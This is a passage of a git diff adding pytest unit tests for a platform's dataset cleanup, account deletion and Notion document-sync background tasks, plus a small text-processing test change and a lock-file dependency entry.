mock_db_session.session.delete.assert_any_call(mock_binding) + + def test_clean_dataset_task_attachment_storage_failure( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that cleanup continues even if attachment storage deletion fails. + + Expected behavior: + - Exception is caught and logged + - Attachment file and binding are still deleted from database + """ + # Arrange + mock_binding = MagicMock() + mock_binding.attachment_id = str(uuid.uuid4()) + + mock_attachment_file = MagicMock() + mock_attachment_file.id = mock_binding.attachment_id + mock_attachment_file.key = f"attachments/{uuid.uuid4()}.pdf" + + mock_db_session.session.execute.return_value.all.return_value = [(mock_binding, mock_attachment_file)] + mock_storage.delete.side_effect = Exception("Storage error") + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert - storage delete was attempted + mock_storage.delete.assert_called_once() + # Records should still be deleted from database + mock_db_session.session.delete.assert_any_call(mock_attachment_file) + mock_db_session.session.delete.assert_any_call(mock_binding) + + +# ============================================================================ +# Test Upload File Cleanup +# ============================================================================ + + +class TestUploadFileCleanup: + """Test cases for upload file cleanup.""" + + def test_clean_dataset_task_deletes_document_upload_files( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that document upload files are deleted. + + Scenario: + - Document has data_source_type = "upload_file" + - data_source_info contains upload_file_id + + Expected behavior: + - Upload file is deleted from storage + - Upload file record is deleted from database + """ + # Arrange + mock_document = MagicMock() + mock_document.id = str(uuid.uuid4()) + mock_document.tenant_id = tenant_id + mock_document.data_source_type = "upload_file" + mock_document.data_source_info = '{"upload_file_id": "test-file-id"}' + mock_document.data_source_info_dict = {"upload_file_id": "test-file-id"} + + mock_upload_file = MagicMock() + mock_upload_file.id = "test-file-id" + mock_upload_file.key = "uploads/test-file.txt" + + mock_db_session.session.scalars.return_value.all.side_effect = [ + [mock_document], # documents + [], # segments + ] + mock_db_session.session.query.return_value.where.return_value.first.return_value = mock_upload_file + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + mock_storage.delete.assert_called_with(mock_upload_file.key) + mock_db_session.session.delete.assert_any_call(mock_upload_file) + + def test_clean_dataset_task_handles_missing_upload_file( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that missing upload files are handled gracefully. + + Scenario: + - Document references an upload_file_id that doesn't exist + + Expected behavior: + - No error is raised + - Cleanup continues normally + """ + # Arrange + mock_document = MagicMock() + mock_document.id = str(uuid.uuid4()) + mock_document.tenant_id = tenant_id + mock_document.data_source_type = "upload_file" + mock_document.data_source_info = '{"upload_file_id": "nonexistent-file"}' + mock_document.data_source_info_dict = {"upload_file_id": "nonexistent-file"} + + mock_db_session.session.scalars.return_value.all.side_effect = [ + [mock_document], # documents + [], # segments + ] + mock_db_session.session.query.return_value.where.return_value.first.return_value = None + + # Act - should not raise exception + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + mock_storage.delete.assert_not_called() + mock_db_session.session.commit.assert_called_once() + + def test_clean_dataset_task_handles_non_upload_file_data_source( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that non-upload_file data sources are skipped. + + Scenario: + - Document has data_source_type = "website" + + Expected behavior: + - No file deletion is attempted + """ + # Arrange + mock_document = MagicMock() + mock_document.id = str(uuid.uuid4()) + mock_document.tenant_id = tenant_id + mock_document.data_source_type = "website" + mock_document.data_source_info = None + + mock_db_session.session.scalars.return_value.all.side_effect = [ + [mock_document], # documents + [], # segments + ] + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert - storage delete should not be called for document files + # (only for image files in segments, which are empty here) + mock_storage.delete.assert_not_called() + + +# ============================================================================ +# Test Image File Cleanup +# ============================================================================ + + +class TestImageFileCleanup: + """Test cases for image file cleanup in segments.""" + + def test_clean_dataset_task_deletes_image_files_in_segments( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that image files referenced in segment content are deleted. + + Scenario: + - Segment content contains image file references + - get_image_upload_file_ids returns file IDs + + Expected behavior: + - Each image file is deleted from storage + - Each image file record is deleted from database + """ + # Arrange + # Need at least one document for segment processing to occur (code is in else block) + mock_document = MagicMock() + mock_document.id = str(uuid.uuid4()) + mock_document.tenant_id = tenant_id + mock_document.data_source_type = "website" # Non-upload type + + mock_segment = MagicMock() + mock_segment.id = str(uuid.uuid4()) + mock_segment.content = ' ' + + image_file_ids = ["image-1", "image-2"] + mock_get_image_upload_file_ids.return_value = image_file_ids + + mock_image_files = [] + for file_id in image_file_ids: + mock_file = MagicMock() + mock_file.id = file_id + mock_file.key = f"images/{file_id}.jpg" + mock_image_files.append(mock_file) + + mock_db_session.session.scalars.return_value.all.side_effect = [ + [mock_document], # documents - need at least one for segment processing + [mock_segment], # segments + ] + + # Setup a mock query chain that returns files in sequence + mock_query = MagicMock() + mock_where = MagicMock() + mock_query.where.return_value = mock_where + mock_where.first.side_effect = mock_image_files + mock_db_session.session.query.return_value = mock_query + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + assert mock_storage.delete.call_count == 2 + mock_storage.delete.assert_any_call("images/image-1.jpg") + mock_storage.delete.assert_any_call("images/image-2.jpg") + + def test_clean_dataset_task_handles_missing_image_file( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that missing image files are handled gracefully. + + Scenario: + - Segment references image file ID that doesn't exist in database + + Expected behavior: + - No error is raised + - Cleanup continues + """ + # Arrange + # Need at least one document for segment processing to occur (code is in else block) + mock_document = MagicMock() + mock_document.id = str(uuid.uuid4()) + mock_document.tenant_id = tenant_id + mock_document.data_source_type = "website" # Non-upload type + + mock_segment = MagicMock() + mock_segment.id = str(uuid.uuid4()) + mock_segment.content = '' + + mock_get_image_upload_file_ids.return_value = ["nonexistent-image"] + + mock_db_session.session.scalars.return_value.all.side_effect = [ + [mock_document], # documents - need at least one for segment processing + [mock_segment], # segments + ] + + # Image file not found + mock_db_session.session.query.return_value.where.return_value.first.return_value = None + + # Act - should not raise exception + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + mock_storage.delete.assert_not_called() + mock_db_session.session.commit.assert_called_once() + + +# ============================================================================ +# Test Edge Cases +# ============================================================================ + + +class TestEdgeCases: + """Test edge cases and boundary conditions.""" + + def test_clean_dataset_task_multiple_documents_and_segments( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test cleanup of multiple documents and segments. + + Scenario: + - Dataset has 5 documents and 10 segments + + Expected behavior: + - All documents and segments are deleted + """ + # Arrange + mock_documents = [] + for i in range(5): + doc = MagicMock() + doc.id = str(uuid.uuid4()) + doc.tenant_id = tenant_id + doc.data_source_type = "website" # Non-upload type + mock_documents.append(doc) + + mock_segments = [] + for i in range(10): + seg = MagicMock() + seg.id = str(uuid.uuid4()) + seg.content = f"Segment content {i}" + mock_segments.append(seg) + + mock_db_session.session.scalars.return_value.all.side_effect = [ + mock_documents, + mock_segments, + ] + mock_get_image_upload_file_ids.return_value = [] + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert - all documents and segments should be deleted + delete_calls = mock_db_session.session.delete.call_args_list + deleted_items = [call[0][0] for call in delete_calls] + + for doc in mock_documents: + assert doc in deleted_items + for seg in mock_segments: + assert seg in deleted_items + + def test_clean_dataset_task_document_with_empty_data_source_info( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test handling of document with empty data_source_info. + + Scenario: + - Document has data_source_type = "upload_file" + - data_source_info is None or empty + + Expected behavior: + - No error is raised + - File deletion is skipped + """ + # Arrange + mock_document = MagicMock() + mock_document.id = str(uuid.uuid4()) + mock_document.tenant_id = tenant_id + mock_document.data_source_type = "upload_file" + mock_document.data_source_info = None + + mock_db_session.session.scalars.return_value.all.side_effect = [ + [mock_document], # documents + [], # segments + ] + + # Act - should not raise exception + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + mock_storage.delete.assert_not_called() + mock_db_session.session.commit.assert_called_once() + + def test_clean_dataset_task_session_always_closed( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that database session is always closed regardless of success or failure. + + Expected behavior: + - Session.close() is called in finally block + """ + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + mock_db_session.session.close.assert_called_once() + + +# ============================================================================ +# Test IndexProcessor Parameters +# ============================================================================ + + +class TestIndexProcessorParameters: + """Test cases for IndexProcessor clean method parameters.""" + + def test_clean_dataset_task_passes_correct_parameters_to_index_processor( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that correct parameters are passed to IndexProcessor.clean(). + + Expected behavior: + - with_keywords=True is passed + - delete_child_chunks=True is passed + - Dataset object with correct attributes is passed + """ + # Arrange + indexing_technique = "high_quality" + index_struct = '{"type": "paragraph"}' + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique=indexing_technique, + index_struct=index_struct, + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + mock_index_processor_factory["processor"].clean.assert_called_once() + call_args = mock_index_processor_factory["processor"].clean.call_args + + # Verify positional arguments + dataset_arg = call_args[0][0] + assert dataset_arg.id == dataset_id + assert dataset_arg.tenant_id == tenant_id + assert dataset_arg.indexing_technique == indexing_technique + assert dataset_arg.index_struct == index_struct + assert dataset_arg.collection_binding_id == collection_binding_id + + # Verify None is passed as second argument + assert call_args[0][1] is None + + # Verify keyword arguments + assert call_args[1]["with_keywords"] is True + assert call_args[1]["delete_child_chunks"] is True diff --git a/api/tests/unit_tests/tasks/test_delete_account_task.py b/api/tests/unit_tests/tasks/test_delete_account_task.py new file mode 100644 index 0000000000..3b148e63f2 --- /dev/null +++ b/api/tests/unit_tests/tasks/test_delete_account_task.py @@ -0,0 +1,112 @@ +""" +Unit tests for delete_account_task. + +Covers: +- Billing enabled with existing account: calls billing and sends success email +- Billing disabled with existing account: skips billing, sends success email +- Account not found: still calls billing when enabled, does not send email +- Billing deletion raises: logs and re-raises, no email +""" + +from types import SimpleNamespace +from unittest.mock import MagicMock, patch + +import pytest + +from tasks.delete_account_task import delete_account_task + + +@pytest.fixture +def mock_db_session(): + """Mock the db.session used in delete_account_task.""" + with patch("tasks.delete_account_task.db.session") as mock_session: + mock_query = MagicMock() + mock_session.query.return_value = mock_query + mock_query.where.return_value = mock_query + yield mock_session + + +@pytest.fixture +def mock_deps(): + """Patch external dependencies: BillingService and send_deletion_success_task.""" + with ( + patch("tasks.delete_account_task.BillingService") as mock_billing, + patch("tasks.delete_account_task.send_deletion_success_task") as mock_mail_task, + ): + # ensure .delay exists on the mail task + mock_mail_task.delay = MagicMock() + yield { + "billing": mock_billing, + "mail_task": mock_mail_task, + } + + +def _set_account_found(mock_db_session, email: str = "user@example.com"): + account = SimpleNamespace(email=email) + mock_db_session.query.return_value.where.return_value.first.return_value = account + return account + + +def _set_account_missing(mock_db_session): + mock_db_session.query.return_value.where.return_value.first.return_value = None + + +class TestDeleteAccountTask: + def test_billing_enabled_account_exists_calls_billing_and_sends_email(self, mock_db_session, mock_deps): + # Arrange + account_id = "acc-123" + account = _set_account_found(mock_db_session, email="a@b.com") + + # Enable billing + with patch("tasks.delete_account_task.dify_config.BILLING_ENABLED", True): + # Act + delete_account_task(account_id) + + # Assert + mock_deps["billing"].delete_account.assert_called_once_with(account_id) + mock_deps["mail_task"].delay.assert_called_once_with(account.email) + + def test_billing_disabled_account_exists_sends_email_only(self, mock_db_session, mock_deps): + # Arrange + account_id = "acc-456" + account = _set_account_found(mock_db_session, email="x@y.com") + + # Disable billing + with patch("tasks.delete_account_task.dify_config.BILLING_ENABLED", False): + # Act + delete_account_task(account_id) + + # Assert + mock_deps["billing"].delete_account.assert_not_called() + mock_deps["mail_task"].delay.assert_called_once_with(account.email) + + def test_account_not_found_billing_enabled_calls_billing_no_email(self, mock_db_session, mock_deps, caplog): + # Arrange + account_id = "missing-id" + _set_account_missing(mock_db_session) + + # Enable billing + with patch("tasks.delete_account_task.dify_config.BILLING_ENABLED", True): + # Act + delete_account_task(account_id) + + # Assert + mock_deps["billing"].delete_account.assert_called_once_with(account_id) + mock_deps["mail_task"].delay.assert_not_called() + # Optional: verify log contains not found message + assert any("not found" in rec.getMessage().lower() for rec in caplog.records) + + def test_billing_delete_raises_propagates_and_no_email(self, mock_db_session, mock_deps): + # Arrange + account_id = "acc-err" + _set_account_found(mock_db_session, email="err@ex.com") + mock_deps["billing"].delete_account.side_effect = RuntimeError("billing down") + + # Enable billing + with patch("tasks.delete_account_task.dify_config.BILLING_ENABLED", True): + # Act & Assert + with pytest.raises(RuntimeError): + delete_account_task(account_id) + + # Ensure email was not sent + mock_deps["mail_task"].delay.assert_not_called() diff --git a/api/tests/unit_tests/tasks/test_document_indexing_sync_task.py b/api/tests/unit_tests/tasks/test_document_indexing_sync_task.py new file mode 100644 index 0000000000..374abe0368 --- /dev/null +++ b/api/tests/unit_tests/tasks/test_document_indexing_sync_task.py @@ -0,0 +1,520 @@ +""" +Unit tests for document indexing sync task. + +This module tests the document indexing sync task functionality including: +- Syncing Notion documents when updated +- Validating document and data source existence +- Credential validation and retrieval +- Cleaning old segments before re-indexing +- Error handling and edge cases +""" + +import uuid +from unittest.mock import MagicMock, Mock, patch + +import pytest + +from core.indexing_runner import DocumentIsPausedError, IndexingRunner +from models.dataset import Dataset, Document, DocumentSegment +from tasks.document_indexing_sync_task import document_indexing_sync_task + +# ============================================================================ +# Fixtures +# ============================================================================ + + +@pytest.fixture +def tenant_id(): + """Generate a unique tenant ID for testing.""" + return str(uuid.uuid4()) + + +@pytest.fixture +def dataset_id(): + """Generate a unique dataset ID for testing.""" + return str(uuid.uuid4()) + + +@pytest.fixture +def document_id(): + """Generate a unique document ID for testing.""" + return str(uuid.uuid4()) + + +@pytest.fixture +def notion_workspace_id(): + """Generate a Notion workspace ID for testing.""" + return str(uuid.uuid4()) + + +@pytest.fixture +def notion_page_id(): + """Generate a Notion page ID for testing.""" + return str(uuid.uuid4()) + + +@pytest.fixture +def credential_id(): + """Generate a credential ID for testing.""" + return str(uuid.uuid4()) + + +@pytest.fixture +def mock_dataset(dataset_id, tenant_id): + """Create a mock Dataset object.""" + dataset = Mock(spec=Dataset) + dataset.id = dataset_id + dataset.tenant_id = tenant_id + dataset.indexing_technique = "high_quality" + dataset.embedding_model_provider = "openai" + dataset.embedding_model = "text-embedding-ada-002" + return dataset + + +@pytest.fixture +def mock_document(document_id, dataset_id, tenant_id, notion_workspace_id, notion_page_id, credential_id): + """Create a mock Document object with Notion data source.""" + doc = Mock(spec=Document) + doc.id = document_id + doc.dataset_id = dataset_id + doc.tenant_id = tenant_id + doc.data_source_type = "notion_import" + doc.indexing_status = "completed" + doc.error = None + doc.stopped_at = None + doc.processing_started_at = None + doc.doc_form = "text_model" + doc.data_source_info_dict = { + "notion_workspace_id": notion_workspace_id, + "notion_page_id": notion_page_id, + "type": "page", + "last_edited_time": "2024-01-01T00:00:00Z", + "credential_id": credential_id, + } + return doc + + +@pytest.fixture +def mock_document_segments(document_id): + """Create mock DocumentSegment objects.""" + segments = [] + for i in range(3): + segment = Mock(spec=DocumentSegment) + segment.id = str(uuid.uuid4()) + segment.document_id = document_id + segment.index_node_id = f"node-{document_id}-{i}" + segments.append(segment) + return segments + + +@pytest.fixture +def mock_db_session(): + """Mock database session.""" + with patch("tasks.document_indexing_sync_task.db.session") as mock_session: + mock_query = MagicMock() + mock_session.query.return_value = mock_query + mock_query.where.return_value = mock_query + mock_session.scalars.return_value = MagicMock() + yield mock_session + + +@pytest.fixture +def mock_datasource_provider_service(): + """Mock DatasourceProviderService.""" + with patch("tasks.document_indexing_sync_task.DatasourceProviderService") as mock_service_class: + mock_service = MagicMock() + mock_service.get_datasource_credentials.return_value = {"integration_secret": "test_token"} + mock_service_class.return_value = mock_service + yield mock_service + + +@pytest.fixture +def mock_notion_extractor(): + """Mock NotionExtractor.""" + with patch("tasks.document_indexing_sync_task.NotionExtractor") as mock_extractor_class: + mock_extractor = MagicMock() + mock_extractor.get_notion_last_edited_time.return_value = "2024-01-02T00:00:00Z" # Updated time + mock_extractor_class.return_value = mock_extractor + yield mock_extractor + + +@pytest.fixture +def mock_index_processor_factory(): + """Mock IndexProcessorFactory.""" + with patch("tasks.document_indexing_sync_task.IndexProcessorFactory") as mock_factory: + mock_processor = MagicMock() + mock_processor.clean = Mock() + mock_factory.return_value.init_index_processor.return_value = mock_processor + yield mock_factory + + +@pytest.fixture +def mock_indexing_runner(): + """Mock IndexingRunner.""" + with patch("tasks.document_indexing_sync_task.IndexingRunner") as mock_runner_class: + mock_runner = MagicMock(spec=IndexingRunner) + mock_runner.run = Mock() + mock_runner_class.return_value = mock_runner + yield mock_runner + + +# ============================================================================ +# Tests for document_indexing_sync_task +# ============================================================================ + + +class TestDocumentIndexingSyncTask: + """Tests for the document_indexing_sync_task function.""" + + def test_document_not_found(self, mock_db_session, dataset_id, document_id): + """Test that task handles document not found gracefully.""" + # Arrange + mock_db_session.query.return_value.where.return_value.first.return_value = None + + # Act + document_indexing_sync_task(dataset_id, document_id) + + # Assert + mock_db_session.close.assert_called_once() + + def test_missing_notion_workspace_id(self, mock_db_session, mock_document, dataset_id, document_id): + """Test that task raises error when notion_workspace_id is missing.""" + # Arrange + mock_document.data_source_info_dict = {"notion_page_id": "page123", "type": "page"} + mock_db_session.query.return_value.where.return_value.first.return_value = mock_document + + # Act & Assert + with pytest.raises(ValueError, match="no notion page found"): + document_indexing_sync_task(dataset_id, document_id) + + def test_missing_notion_page_id(self, mock_db_session, mock_document, dataset_id, document_id): + """Test that task raises error when notion_page_id is missing.""" + # Arrange + mock_document.data_source_info_dict = {"notion_workspace_id": "ws123", "type": "page"} + mock_db_session.query.return_value.where.return_value.first.return_value = mock_document + + # Act & Assert + with pytest.raises(ValueError, match="no notion page found"): + document_indexing_sync_task(dataset_id, document_id) + + def test_empty_data_source_info(self, mock_db_session, mock_document, dataset_id, document_id): + """Test that task raises error when data_source_info is empty.""" + # Arrange + mock_document.data_source_info_dict = None + mock_db_session.query.return_value.where.return_value.first.return_value = mock_document + + # Act & Assert + with pytest.raises(ValueError, match="no notion page found"): + document_indexing_sync_task(dataset_id, document_id) + + def test_credential_not_found( + self, + mock_db_session, + mock_datasource_provider_service, + mock_document, + dataset_id, + document_id, + ): + """Test that task handles missing credentials by updating document status.""" + # Arrange + mock_db_session.query.return_value.where.return_value.first.return_value = mock_document + mock_datasource_provider_service.get_datasource_credentials.return_value = None + + # Act + document_indexing_sync_task(dataset_id, document_id) + + # Assert + assert mock_document.indexing_status == "error" + assert "Datasource credential not found" in mock_document.error + assert mock_document.stopped_at is not None + mock_db_session.commit.assert_called() + mock_db_session.close.assert_called() + + def test_page_not_updated( + self, + mock_db_session, + mock_datasource_provider_service, + mock_notion_extractor, + mock_document, + dataset_id, + document_id, + ): + """Test that task does nothing when page has not been updated.""" + # Arrange + mock_db_session.query.return_value.where.return_value.first.return_value = mock_document + # Return same time as stored in document + mock_notion_extractor.get_notion_last_edited_time.return_value = "2024-01-01T00:00:00Z" + + # Act + document_indexing_sync_task(dataset_id, document_id) + + # Assert + # Document status should remain unchanged + assert mock_document.indexing_status == "completed" + # No session operations should be performed beyond the initial query + mock_db_session.close.assert_not_called() + + def test_successful_sync_when_page_updated( + self, + mock_db_session, + mock_datasource_provider_service, + mock_notion_extractor, + mock_index_processor_factory, + mock_indexing_runner, + mock_dataset, + mock_document, + mock_document_segments, + dataset_id, + document_id, + ): + """Test successful sync flow when Notion page has been updated.""" + # Arrange + mock_db_session.query.return_value.where.return_value.first.side_effect = [mock_document, mock_dataset] + mock_db_session.scalars.return_value.all.return_value = mock_document_segments + # NotionExtractor returns updated time + mock_notion_extractor.get_notion_last_edited_time.return_value = "2024-01-02T00:00:00Z" + + # Act + document_indexing_sync_task(dataset_id, document_id) + + # Assert + # Verify document status was updated to parsing + assert mock_document.indexing_status == "parsing" + assert mock_document.processing_started_at is not None + + # Verify segments were cleaned + mock_processor = mock_index_processor_factory.return_value.init_index_processor.return_value + mock_processor.clean.assert_called_once() + + # Verify segments were deleted from database + for segment in mock_document_segments: + mock_db_session.delete.assert_any_call(segment) + + # Verify indexing runner was called + mock_indexing_runner.run.assert_called_once_with([mock_document]) + + # Verify session operations + assert mock_db_session.commit.called + mock_db_session.close.assert_called_once() + + def test_dataset_not_found_during_cleaning( + self, + mock_db_session, + mock_datasource_provider_service, + mock_notion_extractor, + mock_document, + dataset_id, + document_id, + ): + """Test that task handles dataset not found during cleaning phase.""" + # Arrange + mock_db_session.query.return_value.where.return_value.first.side_effect = [mock_document, None] + mock_notion_extractor.get_notion_last_edited_time.return_value = "2024-01-02T00:00:00Z" + + # Act + document_indexing_sync_task(dataset_id, document_id) + + # Assert + # Document should still be set to parsing + assert mock_document.indexing_status == "parsing" + # Session should be closed after error + mock_db_session.close.assert_called_once() + + def test_cleaning_error_continues_to_indexing( + self, + mock_db_session, + mock_datasource_provider_service, + mock_notion_extractor, + mock_index_processor_factory, + mock_indexing_runner, + mock_dataset, + mock_document, + dataset_id, + document_id, + ): + """Test that indexing continues even if cleaning fails.""" + # Arrange + mock_db_session.query.return_value.where.return_value.first.side_effect = [mock_document, mock_dataset] + mock_db_session.scalars.return_value.all.side_effect = Exception("Cleaning error") + mock_notion_extractor.get_notion_last_edited_time.return_value = "2024-01-02T00:00:00Z" + + # Act + document_indexing_sync_task(dataset_id, document_id) + + # Assert + # Indexing should still be attempted despite cleaning error + mock_indexing_runner.run.assert_called_once_with([mock_document]) + mock_db_session.close.assert_called_once() + + def test_indexing_runner_document_paused_error( + self, + mock_db_session, + mock_datasource_provider_service, + mock_notion_extractor, + mock_index_processor_factory, + mock_indexing_runner, + mock_dataset, + mock_document, + mock_document_segments, + dataset_id, + document_id, + ): + """Test that DocumentIsPausedError is handled gracefully.""" + # Arrange + mock_db_session.query.return_value.where.return_value.first.side_effect = [mock_document, mock_dataset] + mock_db_session.scalars.return_value.all.return_value = mock_document_segments + mock_notion_extractor.get_notion_last_edited_time.return_value = "2024-01-02T00:00:00Z" + mock_indexing_runner.run.side_effect = DocumentIsPausedError("Document paused") + + # Act + document_indexing_sync_task(dataset_id, document_id) + + # Assert + # Session should be closed after handling error + mock_db_session.close.assert_called_once() + + def test_indexing_runner_general_error( + self, + mock_db_session, + mock_datasource_provider_service, + mock_notion_extractor, + mock_index_processor_factory, + mock_indexing_runner, + mock_dataset, + mock_document, + mock_document_segments, + dataset_id, + document_id, + ): + """Test that general exceptions during indexing are handled.""" + # Arrange + mock_db_session.query.return_value.where.return_value.first.side_effect = [mock_document, mock_dataset] + mock_db_session.scalars.return_value.all.return_value = mock_document_segments + mock_notion_extractor.get_notion_last_edited_time.return_value = "2024-01-02T00:00:00Z" + mock_indexing_runner.run.side_effect = Exception("Indexing error") + + # Act + document_indexing_sync_task(dataset_id, document_id) + + # Assert + # Session should be closed after error + mock_db_session.close.assert_called_once() + + def test_notion_extractor_initialized_with_correct_params( + self, + mock_db_session, + mock_datasource_provider_service, + mock_notion_extractor, + mock_document, + dataset_id, + document_id, + notion_workspace_id, + notion_page_id, + ): + """Test that NotionExtractor is initialized with correct parameters.""" + # Arrange + mock_db_session.query.return_value.where.return_value.first.return_value = mock_document + mock_notion_extractor.get_notion_last_edited_time.return_value = "2024-01-01T00:00:00Z" # No update + + # Act + with patch("tasks.document_indexing_sync_task.NotionExtractor") as mock_extractor_class: + mock_extractor = MagicMock() + mock_extractor.get_notion_last_edited_time.return_value = "2024-01-01T00:00:00Z" + mock_extractor_class.return_value = mock_extractor + + document_indexing_sync_task(dataset_id, document_id) + + # Assert + mock_extractor_class.assert_called_once_with( + notion_workspace_id=notion_workspace_id, + notion_obj_id=notion_page_id, + notion_page_type="page", + notion_access_token="test_token", + tenant_id=mock_document.tenant_id, + ) + + def test_datasource_credentials_requested_correctly( + self, + mock_db_session, + mock_datasource_provider_service, + mock_notion_extractor, + mock_document, + dataset_id, + document_id, + credential_id, + ): + """Test that datasource credentials are requested with correct parameters.""" + # Arrange + mock_db_session.query.return_value.where.return_value.first.return_value = mock_document + mock_notion_extractor.get_notion_last_edited_time.return_value = "2024-01-01T00:00:00Z" + + # Act + document_indexing_sync_task(dataset_id, document_id) + + # Assert + mock_datasource_provider_service.get_datasource_credentials.assert_called_once_with( + tenant_id=mock_document.tenant_id, + credential_id=credential_id, + provider="notion_datasource", + plugin_id="langgenius/notion_datasource", + ) + + def test_credential_id_missing_uses_none( + self, + mock_db_session, + mock_datasource_provider_service, + mock_notion_extractor, + mock_document, + dataset_id, + document_id, + ): + """Test that task handles missing credential_id by passing None.""" + # Arrange + mock_document.data_source_info_dict = { + "notion_workspace_id": "ws123", + "notion_page_id": "page123", + "type": "page", + "last_edited_time": "2024-01-01T00:00:00Z", + } + mock_db_session.query.return_value.where.return_value.first.return_value = mock_document + mock_notion_extractor.get_notion_last_edited_time.return_value = "2024-01-01T00:00:00Z" + + # Act + document_indexing_sync_task(dataset_id, document_id) + + # Assert + mock_datasource_provider_service.get_datasource_credentials.assert_called_once_with( + tenant_id=mock_document.tenant_id, + credential_id=None, + provider="notion_datasource", + plugin_id="langgenius/notion_datasource", + ) + + def test_index_processor_clean_called_with_correct_params( + self, + mock_db_session, + mock_datasource_provider_service, + mock_notion_extractor, + mock_index_processor_factory, + mock_indexing_runner, + mock_dataset, + mock_document, + mock_document_segments, + dataset_id, + document_id, + ): + """Test that index processor clean is called with correct parameters.""" + # Arrange + mock_db_session.query.return_value.where.return_value.first.side_effect = [mock_document, mock_dataset] + mock_db_session.scalars.return_value.all.return_value = mock_document_segments + mock_notion_extractor.get_notion_last_edited_time.return_value = "2024-01-02T00:00:00Z" + + # Act + document_indexing_sync_task(dataset_id, document_id) + + # Assert + mock_processor = mock_index_processor_factory.return_value.init_index_processor.return_value + expected_node_ids = [seg.index_node_id for seg in mock_document_segments] + mock_processor.clean.assert_called_once_with( + mock_dataset, expected_node_ids, with_keywords=True, delete_child_chunks=True + ) diff --git a/api/tests/unit_tests/utils/test_text_processing.py b/api/tests/unit_tests/utils/test_text_processing.py index 8bfc97ae63..11e017464a 100644 --- a/api/tests/unit_tests/utils/test_text_processing.py +++ b/api/tests/unit_tests/utils/test_text_processing.py @@ -8,10 +8,13 @@ from core.tools.utils.text_processing_utils import remove_leading_symbols [ ("...Hello, World!", "Hello, World!"), ("。测试中文标点", "测试中文标点"), - ("!@#Test symbols", "Test symbols"), + # Note: ! is not in the removal pattern, only @# are removed, leaving "!Test symbols" + # The pattern intentionally excludes ! as per #11868 fix + ("@#Test symbols", "Test symbols"), ("Hello, World!", "Hello, World!"), ("", ""), (" ", " "), + ("【测试】", "【测试】"), ], ) def test_remove_leading_symbols(input_text, expected_output): diff --git a/api/uv.lock b/api/uv.lock index 682f186a4a..27b30251d9 100644 --- a/api/uv.lock +++ b/api/uv.lock @@ -291,6 +291,22 @@ dependencies = [ ] sdist = { url = "https://files.pythonhosted.org/packages/32/eb/5e82e419c3061823f3feae9b5681588762929dc4da0176667297c2784c1a/alibabacloud_tea_xml-0.0.3.tar.gz", hash = "sha256:979cb51fadf43de77f41c69fc69c12529728919f849723eb0cd24eb7b048a90c", size = 3466, upload-time = "2025-07-01T08:04:55.144Z" } +[[package]] +name = "aliyun-log-python-sdk" +version = "0.9.37" +source = { registry = "https://pypi.org/simple" } +dependencies = [ + { name = "dateparser" }, + { name = "elasticsearch" }, + { name = "jmespath" }, + { name = "lz4" }, + { name = "protobuf" }, + { name = "python-dateutil" }, + { name = "requests" }, + { name = "six" }, +] +sdist = { url = 